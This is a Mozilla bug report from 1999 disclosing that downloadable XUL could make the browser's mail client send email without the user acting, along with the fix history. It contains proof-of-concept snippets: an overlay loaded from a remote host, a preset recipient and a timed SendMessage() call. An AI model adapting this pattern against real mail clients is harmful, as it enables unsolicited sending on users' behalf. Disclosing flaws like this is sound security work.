Closed
Bug 12934
Opened 25 years ago
Closed 25 years ago
Downloadable XUL allows automatically sending email
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M13
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
There is a security vulnerability in build 1999082116 (guess others) which
allows automatically sending email using downloadable XUL.
[I could not make Messenger send a message even from Messenger in this build,
but the demonstration opens a TCP connection to port 25 of the SMTP server and
this is enough for me.]
Demonstration is available at: http://www.nat.bg/~joro/mozilla/msg/send.html
The code is:
In addressingWidgetOverlay.xul the following is modified:
<html:input id="msgRecipient#1" value="nobodyx@nosuchdomain.com" ...
In messengercompose.xul the following modified:
<?xul-overlay
href="http://www.nat.bg/~joro/mozilla/msg/addressingWidgetOverlay.xul"?>
.....
<html:input id="msgSubject" value="Test for automatically sending messages"
type="text" flex="80%" onkeyup="SetComposeWindowTitle(event.which);"/>
.....
setTimeout("alert('Trying to send message');SendMessage();",20000);
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Summary: Downloadable XUL allows automatically sending of email → Downloadable XUL allows automatically sending email
Assignee | ||
Comment 1•25 years ago
|
||
Another use of XPAppCoresManager.
Assignee | ||
Updated•25 years ago
|
Target Milestone: M11
Assignee | ||
Comment 2•25 years ago
|
||
Move security bugs from M11 to M13; needed for beta but not for dogfood.
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 3•25 years ago
|
||
XPAppCoresManager finally died, closing this security hole.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•